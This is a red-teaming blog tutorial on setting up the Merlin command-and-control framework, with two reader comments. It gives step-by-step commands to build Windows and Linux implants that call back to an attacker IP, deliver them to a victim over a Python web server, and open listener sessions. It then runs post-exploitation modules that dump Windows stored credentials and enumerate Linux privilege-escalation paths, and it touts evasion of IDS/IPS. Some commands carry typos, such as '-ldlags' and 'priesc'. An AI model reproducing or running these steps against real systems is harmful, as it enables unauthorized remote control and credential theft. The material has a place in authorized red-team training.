Categories

Archives

Red Teaming

Command and Control Guide to Merlin

In this article, we learn how to use Merlin C2 tool. It is developed by Russel Van Tuyl in Go language.

Table of content:

  • Introduction
  • Installation
  • Windows exploitation
  • Windows post exploitation
  • Linux exploitation
  • Linux post exploitation

Introduction

Merlin is a great cross-platform Command and control tool written in the Go language. It’s made of two elements i.e. the server and agent. It works on the HTTP/2 protocol. The best things about Merlin are that it is compiled to work on any platform and that you can even build it from source. Normally, agents are put on windows and are being listened on Linux but due to being written in Go language, Merlin lets us put agents on any platform/machine we come across and we can listen to it also on any platform. This is much more successful than others when it comes to red teaming as it makes IDS/IPS struggle to identify it.

The Merlin server is to be run in the folder where agents can call out to it. By default, the server is configured on 127.0.0.1:443 but you can change it to your own IP. The merlin agent can be, as discussed earlier, cross-complicated to run on any platform. Agents are interacted using the Merlin server. Any binary file is executed with the target’s path variable.

Installation

Merlin’s installation is pretty tricky. The most convenient way to download is shown in this article. Installing Go language is compulsory in order for Merlin to work. So, to install the Go language type:

apt install golang

And then to install merlin the following commands:

mkdir /opt/merlin;cd /opt/merlin
wget //github.com/Ne0nd0g/merlin/releases/download/v0.1.4/merlinServer-Linux-x64-v0.1.4.7z

Once the above commands are executed successfully, use the following command to unzip merlin server.

7z x merlinServer-Linux-x64-v0.1.4.7z

Now, after unzipping, when you use ls command; you will find the merlin server and readme file. We can check if the server is running by using the following command:

./merlinServer-Linux-x64

In “README.MD”, we find the instructions for installing “Merlin” in our system.

Now according to the readme file, we have to setup GOPATH environment variable for the installation and then install merlin using “go” instead of git clone. So, to complete these steps run the following set of commands:

echo "export GOPATH=$HOME/go" >> .bashrc
source .bashrc
go get github.com/Ne0nD0g/merlin

Once the directory is downloaded, let’s check its contents using cd and ls commands.

There was a cmd directory, and in it, there was a directory named merlinserver where we found main.go. Run main.go as shown in the image below :

go run main.go

As you can see the tool merlin is still not running properly as there is no SSL certificate given to it. If you navigate through the /opt/merlin directory, you will find a directory named data in which there is an SSL certificate. Copy the data folder into the merlinserver directory as shown in the image below:

Now if you run merlin using the command: go run main.go, merlin server will run successfully.

Now using the following help command you can see, as shown in the image, the arguments that you can use to run your commands as desired:

go run main.go -h

Windows exploitation

Now, to make Merlin agent for windows type the following command:

GOOS=windows GOARCH=amd64 go build -ldlags "-X main.url=//192.168.0.11:443" -o shell.exe main.go

Now, share the shell with the target using the python server:

python -m SimpleHTTPServer 80

In order to create a listener for the shell to revert, use the following command:

go run main.go -i 192.168.0.11

And just like that, you will have your session as shown in the image above. Now, use the help command to see all the options as shown in the image given below:

Type sessions to see the list of the sessions you acquire as shown in the image below:

To access than an available session uses the following command:

interact <session name>

As you have accessed the session, here you can use windows commands such as:

shell ipconfig

Then further you can use various post exploitation modules, list of which are shown in the image below:

Windows post exploitation

We will be using a module here to dump the credentials of windows and to activate the said post exploitation module type:

use module windows/x64/powershell/credentials/dumpCredStore

As you can see in the image above that info commands gives us all the details about the module including the options that we need to specify in the module. So, therefore, let’s set the options:

set agent <agent name>
run

Linux exploitation

Now, we will make a merlin agent for Linux machine. For this, simply type the following command:

Export GOOS=linux;export GOARCH=amd64; go build -ldflags "-s -w -X main.url=//192.168.0.11:443" -o shell.elf main.go

Once the command is executed, your malware will be created. Use the python to share the file with the victim as shown in the image below or however see it fit. For starting python HTTP server:

python -m SimpleHTTPServer 80

Setup the listener and wait for the file to get executed.

go run main.go -I 192.168.0.11

And as shown in the image above, you will have your session. Then type sessions to see the list of sessions gained.

Then to access the session use the following command:

interact <session name>

Then further you can use any Linux command such as:

shell ls

Linux post exploitation

Even in Linux, you can further use a number of post-exploitation modules. The one we will be using in this article is privesc/LinEnum:

use module linux/x64/bash/priesc/LinEnum

Through info command, we know that we have to give a session in order to run this module. So, type:

set agent <session name>
run

And this way your module will run. Try and work with Merlin c2 tool as its one of best and as you can see how convenient it is crossed-platformed.

Author: Sayantan Bera is a technical writer at hacking articles and cybersecurity enthusiast. Contact Here

2 thoughts on “Command and Control Guide to Merlin

  1. In the windows exploitation agent creation command should be -ldflags instead of -ldlags

  2. Nice write up on Merlin. I would recommend to use the published release binaries and skip trying to build from source. The server packages contain a copy of the compiled agents for all platforms in the bin/ directory.

    If you really want to build from source instead of using the release files, then use the built-in Make file to generate agents. You can generate an agent with the Make file like `make agent-dll` or you could generate an agent with a hardcoded URL with `make windows-agent URL=https://malware.domain.com:443/`

    The main takeaway is that you would either download the release or build from source, but you don’t need to do both.

    Check out the Wiki for up to date information: https://github.com/Ne0nd0g/merlin/wiki

Comments are closed.